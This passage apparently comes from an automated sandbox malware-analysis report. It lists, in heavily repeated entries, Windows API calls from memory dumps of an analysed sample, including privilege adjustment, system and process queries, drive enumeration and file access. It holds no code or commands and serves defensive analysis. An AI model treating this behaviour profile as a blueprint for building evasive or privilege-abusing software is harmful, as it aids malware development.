                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027B01D0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027B132F
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 027B0FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027B0502
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 027B0640
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 027B1148
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 027B099C
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2177209596.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157549744.0000000001E92000.00000040.00000001.sdmp, Offset: 01E92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157549744.0000000001E92000.00000040.00000001.sdmp, Offset: 01E92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E0AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E0AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E0B329
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E0B329
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01E0A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E0A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E0AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01E0BB2F
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E0BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01E0A39C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E0AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E0AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E0ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E0BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01E0A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01E0BB2F
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E0A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E0ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01E0A39C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E0AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E0A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E0A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158782735.0000000001E02000.00000040.00000001.sdmp, Offset: 01E02000, based on PE: false
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158782735.0000000001E02000.00000040.00000001.sdmp, Offset: 01E02000, based on PE: false
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
